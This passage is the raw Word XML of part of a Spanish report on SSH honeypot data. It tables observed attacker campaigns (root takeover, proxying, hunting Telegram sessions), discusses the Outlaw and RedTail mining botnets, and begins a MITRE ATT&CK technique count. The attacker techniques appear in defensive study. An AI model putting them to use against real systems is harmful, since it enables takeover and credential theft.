+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Toma de control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">chpasswd sobre root; vaciado de /etc/hosts.deny y eliminación de procesos ajenos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">15 y 14 sesiones</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Expulsar al administrador y a otros intrusos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Uso como proxy</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Peticiones de reenvío TCP, sobre todo hacia una IP en el puerto 2535</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">56 sesiones, 5 IPs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ocultar el origen real del tráfico</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Búsqueda de datos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Rutas de sesiones de Telegram Desktop y de módems y pasarelas SMS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2 sesiones</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1400"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Robo de cuentas o envío de SMS fraudulentos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 14. Campañas y comportamientos identificados.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La campaña de Outlaw es la más extendida: 97 IPs distintas repiten exactamente la misma secuencia de comandos, lo que indica una botnet ya consolidada que se propaga desde los equipos que infecta. Outlaw es una botnet de minería de Monero que entra por credenciales SSH débiles y cuyos scripts eliminan los mineros de la competencia (Souza et al., 2025). RedTail también es un minero, documentado por el SANS Internet Storm Center con exactamente el mismo conjunto de ficheros: un setup.sh que detecta la arquitectura de la víctima y ejecuta el binario correspondiente, además de instalar una clave SSH para garantizar la persistencia (Riley, 2024). En los datos del proyecto, el comando que acompaña a la subida incluye, efectivamente, la escritura de una clave en authorized_keys.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La comprobación de honeypot tiene una lectura directa para el proyecto: los atacantes también analizan el sistema al que acceden, y un honeypot de media interacción como Cowrie tiene límites para superar esas pruebas. Es una de las líneas de mejora recogidas en Trabajos Futuros.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El clasificador asignó la actividad a 21 técnicas de 9 tácticas. La Tabla 15 resume las más relevantes de cada táctica y la Figura 8 muestra todas ellas por número de sesiones.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2064"/>
+        <w:gridCol w:w="4604"/>
+        <w:gridCol w:w="1270"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Táctica</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Técnica</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Sesiones</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Credential Access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1110.001 Brute Force: Password Guessing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">10 517</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Initial Access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1078.003 Valid Accounts: Local Accounts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2 060</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Execution</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1059.004 Command and Scripting Interpreter: Unix Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">1 553</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1082 System Information Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">764</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1222.002 File and Directory Permissions Modification</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">604</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Persistence</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1098.004 Account Manipulation: SSH Authorized Keys</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">400</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1497.001 Virtualization/Sandbox Evasion: System Checks</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">203</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1300"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
